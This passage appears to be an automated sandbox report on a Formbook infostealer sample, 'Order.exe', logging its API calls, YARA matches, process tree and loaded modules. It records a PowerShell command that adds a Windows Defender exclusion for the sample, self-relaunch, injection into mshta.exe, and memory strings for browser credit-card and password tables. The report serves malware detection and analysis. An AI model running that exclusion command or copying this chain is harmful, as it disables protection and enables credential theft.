                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01982C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_01982C70
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019835C0 NtCreateMutant,LdrInitializeThunk,5_2_019835C0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01984340 NtSetContextThread,5_2_01984340
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_01984650 NtSuspendThread
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_01982B80 NtQueryInformationFile
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_01982BA0 NtEnumerateValueKey
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_01982BF0 NtAllocateVirtualMemory
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_01982BE0 NtQueryValueKey
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_01982AB0 NtWaitForSingleObject
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_01982AD0 NtReadFile
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_01982AF0 NtWriteFile
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_01982DB0 NtEnumerateKey
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_01982DD0 NtDelayExecution
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_01982D10 NtMapViewOfSection
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_01982D00 NtSetInformationFile
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_01982D30 NtUnmapViewOfSection
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_01982CA0 NtQueryInformationToken
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_01982CC0 NtQueryVirtualMemory
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_01982CF0 NtOpenProcess
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_01982C00 NtQueryInformationProcess
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_01982C60 NtCreateKey
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_01982F90 NtProtectVirtualMemory
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_01982FB0 NtResumeThread
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_01982FA0 NtQuerySection
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_01982FE0 NtCreateFile
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_01982F30 NtCreateSection
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_01982F60 NtCreateProcessEx
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_01982E80 NtReadVirtualMemory
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_01982EA0 NtAdjustPrivilegesToken
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_01982EE0 NtQueueApcThread
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_01982E30 NtWriteVirtualMemory
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_01983090 NtSetValueKey
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_01983010 NtOpenDirectoryObject
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_019839B0 NtGetContextThread
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_01983D10 NtOpenProcessToken
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_01983D70 NtOpenThread
                  Source: C:\Windows\SysWOW64\mshta.exe | Code function: 9_2_03984340 NtSetContextThread, LdrInitializeThunk
                  Source: C:\Windows\SysWOW64\mshta.exe | Code function: 9_2_03984650 NtSuspendThread, LdrInitializeThunk
                  Source: C:\Windows\SysWOW64\mshta.exe | Code function: 9_2_03982BA0 NtEnumerateValueKey, LdrInitializeThunk
                  Source: C:\Windows\SysWOW64\mshta.exe | Code function: 9_2_03982BF0 NtAllocateVirtualMemory, LdrInitializeThunk
                  Source: C:\Windows\SysWOW64\mshta.exe | Code function: 9_2_03982BE0 NtQueryValueKey, LdrInitializeThunk
                  Source: C:\Windows\SysWOW64\mshta.exe | Code function: 9_2_03982B60 NtClose, LdrInitializeThunk
                  Source: C:\Windows\SysWOW64\mshta.exe | Code function: 9_2_03982AD0 NtReadFile, LdrInitializeThunk
                  Source: C:\Windows\SysWOW64\mshta.exe | Code function: 9_2_03982AF0 NtWriteFile, LdrInitializeThunk
                  Source: C:\Windows\SysWOW64\mshta.exe | Code function: 9_2_03982FB0 NtResumeThread, LdrInitializeThunk
                  Source: C:\Windows\SysWOW64\mshta.exe | Code function: 9_2_03982FE0 NtCreateFile, LdrInitializeThunk
                  Source: C:\Windows\SysWOW64\mshta.exe | Code function: 9_2_03982F30 NtCreateSection, LdrInitializeThunk
                  Source: C:\Windows\SysWOW64\mshta.exe | Code function: 9_2_03982E80 NtReadVirtualMemory, LdrInitializeThunk
                  Source: C:\Windows\SysWOW64\mshta.exe | Code function: 9_2_03982EE0 NtQueueApcThread, LdrInitializeThunk
                  Source: C:\Windows\SysWOW64\mshta.exe | Code function: 9_2_03982DD0 NtDelayExecution, LdrInitializeThunk
                  Source: C:\Windows\SysWOW64\mshta.exe | Code function: 9_2_03982DF0 NtQuerySystemInformation, LdrInitializeThunk
                  Source: C:\Windows\SysWOW64\mshta.exe | Code function: 9_2_03982D10 NtMapViewOfSection, LdrInitializeThunk
                  Source: C:\Windows\SysWOW64\mshta.exe | Code function: 9_2_03982D30 NtUnmapViewOfSection, LdrInitializeThunk
                  Source: C:\Windows\SysWOW64\mshta.exe | Code function: 9_2_03982CA0 NtQueryInformationToken, LdrInitializeThunk
                  Source: C:\Windows\SysWOW64\mshta.exe | Code function: 9_2_03982C70 NtFreeVirtualMemory, LdrInitializeThunk
                  Source: C:\Windows\SysWOW64\mshta.exe | Code function: 9_2_03982C60 NtCreateKey, LdrInitializeThunk
                  Source: C:\Windows\SysWOW64\mshta.exe | Code function: 9_2_039835C0 NtCreateMutant, LdrInitializeThunk
                  Source: C:\Windows\SysWOW64\mshta.exe | Code function: 9_2_039839B0 NtGetContextThread, LdrInitializeThunk
                  Source: C:\Windows\SysWOW64\mshta.exe | Code function: 9_2_03982B80 NtQueryInformationFile
                  Source: C:\Windows\SysWOW64\mshta.exe | Code function: 9_2_03982AB0 NtWaitForSingleObject
                  Source: C:\Windows\SysWOW64\mshta.exe | Code function: 9_2_03982F90 NtProtectVirtualMemory
                  Source: C:\Windows\SysWOW64\mshta.exe | Code function: 9_2_03982FA0 NtQuerySection
                  Source: C:\Windows\SysWOW64\mshta.exe | Code function: 9_2_03982F60 NtCreateProcessEx
                  Source: C:\Windows\SysWOW64\mshta.exe | Code function: 9_2_03982EA0 NtAdjustPrivilegesToken
                  Source: C:\Windows\SysWOW64\mshta.exe | Code function: 9_2_03982E30 NtWriteVirtualMemory
                  Source: C:\Windows\SysWOW64\mshta.exe | Code function: 9_2_03982DB0 NtEnumerateKey
                  Source: C:\Windows\SysWOW64\mshta.exe | Code function: 9_2_03982D00 NtSetInformationFile
                  Source: C:\Windows\SysWOW64\mshta.exe | Code function: 9_2_03982CC0 NtQueryVirtualMemory
                  Source: C:\Windows\SysWOW64\mshta.exe | Code function: 9_2_03982CF0 NtOpenProcess
                  Source: C:\Windows\SysWOW64\mshta.exe | Code function: 9_2_03982C00 NtQueryInformationProcess
                  Source: C:\Windows\SysWOW64\mshta.exe | Code function: 9_2_03983090 NtSetValueKey
                  Source: C:\Windows\SysWOW64\mshta.exe | Code function: 9_2_03983010 NtOpenDirectoryObject
                  Source: C:\Windows\SysWOW64\mshta.exe | Code function: 9_2_03983D10 NtOpenProcessToken
                  Source: C:\Windows\SysWOW64\mshta.exe | Code function: 9_2_03983D70 NtOpenThread
                  Source: C:\Windows\SysWOW64\mshta.exe | Code function: 9_2_00BA9210 NtCreateFile
                  Source: C:\Windows\SysWOW64\mshta.exe | Code function: 9_2_00BA9380 NtReadFile
                  Source: C:\Windows\SysWOW64\mshta.exe | Code function: 9_2_00BA9470 NtDeleteFile
                  Source: C:\Windows\SysWOW64\mshta.exe | Code function: 9_2_00BA9510 NtClose
                  Source: C:\Windows\SysWOW64\mshta.exe | Code function: 9_2_00BA9680 NtAllocateVirtualMemory
                  Source: C:\Users\user\Desktop\Order.exe | Code function: String function: 01985130 appears 58 times
                  Source: C:\Users\user\Desktop\Order.exe | Code function: String function: 019CF290 appears 103 times
                  Source: C:\Users\user\Desktop\Order.exe | Code function: String function: 01997E54 appears 107 times
                  Source: C:\Users\user\Desktop\Order.exe | Code function: String function: 0193B970 appears 262 times
                  Source: C:\Users\user\Desktop\Order.exe | Code function: String function: 019BEA12 appears 86 times
                  Source: C:\Windows\SysWOW64\mshta.exe | Code function: String function: 039BEA12 appears 86 times
                  Source: C:\Windows\SysWOW64\mshta.exe | Code function: String function: 03997E54 appears 107 times
                  Source: C:\Windows\SysWOW64\mshta.exe | Code function: String function: 0393B970 appears 262 times
                  Source: C:\Windows\SysWOW64\mshta.exe | Code function: String function: 039CF290 appears 103 times
                  Source: C:\Windows\SysWOW64\mshta.exe | Code function: String function: 03985130 appears 58 times
                  Source: Order.exe, 00000000.00000002.1740687497.0000000003A39000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTyrone.dll8 vs Order.exe
                  Source: Order.exe, 00000000.00000002.1736244515.0000000000C2E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs Order.exe
                  Source: Order.exe, 00000000.00000002.1760307093.00000000076B0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameTyrone.dll8 vs Order.exe
                  Source: Order.exe, 00000000.00000000.1671095901.00000000005FA000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameqwhy.exe& vs Order.exe
                  Source: Order.exe, 00000005.00000002.1904639284.00000000013B7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMSHTA.EXED vs Order.exe
                  Source: Order.exe, 00000005.00000002.1905093933.0000000001A3D000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs Order.exe
                  Source: Order.exe, 00000005.00000002.1904639284.00000000013A7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMSHTA.EXED vs Order.exe
                  Source: Order.exe | Binary or memory string: OriginalFilenameqwhy.exe& vs Order.exe
                  Source: Order.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 5.2.Order.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                  Source: 5.2.Order.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                  Source: 00000005.00000002.1904953976.0000000001880000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                  Source: 00000009.00000002.4144193946.0000000003500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                  Source: 00000009.00000002.4144156725.00000000034B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                  Source: 00000009.00000002.4143227652.0000000000B80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                  Source: 00000005.00000002.1904392039.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                  Source: 0000000C.00000002.4145802850.0000000004A60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                  Source: 00000005.00000002.1906112434.0000000001D60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                  Source: 00000007.00000002.4144094992.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                  Source: Order.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: 0.2.Order.exe.3a55808.1.raw.unpack, at4ONG9F0NYCELN5Tj.csCryptographic APIs: 'CreateDecryptor'
                  Source: 0.2.Order.exe.3a6a628.2.raw.unpack, at4ONG9F0NYCELN5Tj.csCryptographic APIs: 'CreateDecryptor'
                  Source: 0.2.Order.exe.5130000.3.raw.unpack, at4ONG9F0NYCELN5Tj.csCryptographic APIs: 'CreateDecryptor'
                  Source: 0.2.Order.exe.3b11f78.0.raw.unpack, XwfOjXhll0ZZ4kvBsZ.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.Order.exe.3b11f78.0.raw.unpack, O0Iv47e57KSi8J9mms.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                  Source: 0.2.Order.exe.3b11f78.0.raw.unpack, O0Iv47e57KSi8J9mms.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.Order.exe.3b11f78.0.raw.unpack, O0Iv47e57KSi8J9mms.csSecurity API names: _0020.AddAccessRule
                  Source: 0.2.Order.exe.76b0000.4.raw.unpack, XwfOjXhll0ZZ4kvBsZ.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.Order.exe.76b0000.4.raw.unpack, O0Iv47e57KSi8J9mms.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                  Source: 0.2.Order.exe.76b0000.4.raw.unpack, O0Iv47e57KSi8J9mms.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.Order.exe.76b0000.4.raw.unpack, O0Iv47e57KSi8J9mms.csSecurity API names: _0020.AddAccessRule
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@14/7@16/10
                  Source: C:\Users\user\Desktop\Order.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Order.exe.logJump to behavior
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2080:120:WilError_03
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                  Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3848:120:WilError_03
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5ojejimv.xok.ps1Jump to behavior
                  Source: Order.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: Order.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                  Source: C:\Users\user\Desktop\Order.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: mshta.exe, 00000009.00000002.4146580706.00000000083B6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE credit_cards ( guid VARCHAR PRIMARY KEY, name_on_card VARCHAR, expiration_month INTEGER, expiration_year INTEGER, card_number_encrypted BLOB, date_modified INTEGER NOT NULL DEFAULT 0, origin VARCHAR DEFAULT '', use_@b;
                  Source: mshta.exe, 00000009.00000002.4146580706.00000000083B6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE autofill_profiles ( guid VARCHAR PRIMARY KEY, company_name VARCHAR, `~;
                  Source: mshta.exe, 00000009.00000003.2088990665.0000000003337000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.2090094335.0000000003337000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.4143600767.0000000003337000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: Order.exeReversingLabs: Detection: 65%
                  Source: Order.exeVirustotal: Detection: 49%
                  Source: unknownProcess created: C:\Users\user\Desktop\Order.exe "C:\Users\user\Desktop\Order.exe"
                  Source: C:\Users\user\Desktop\Order.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Order.exe"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\Order.exeProcess created: C:\Users\user\Desktop\Order.exe "C:\Users\user\Desktop\Order.exe"
                  Source: C:\Users\user\Desktop\Order.exeProcess created: C:\Users\user\Desktop\Order.exe "C:\Users\user\Desktop\Order.exe"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                  Source: C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exeProcess created: C:\Windows\SysWOW64\mshta.exe "C:\Windows\SysWOW64\mshta.exe"
                  Source: C:\Users\user\Desktop\Order.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                  Source: C:\Users\user\Desktop\Order.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Order.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\Order.exeProcess created: C:\Users\user\Desktop\Order.exe "C:\Users\user\Desktop\Order.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\Order.exeProcess created: C:\Users\user\Desktop\Order.exe "C:\Users\user\Desktop\Order.exe"Jump to behavior
                  Source: C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exeProcess created: C:\Windows\SysWOW64\mshta.exe "C:\Windows\SysWOW64\mshta.exe"Jump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\Order.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
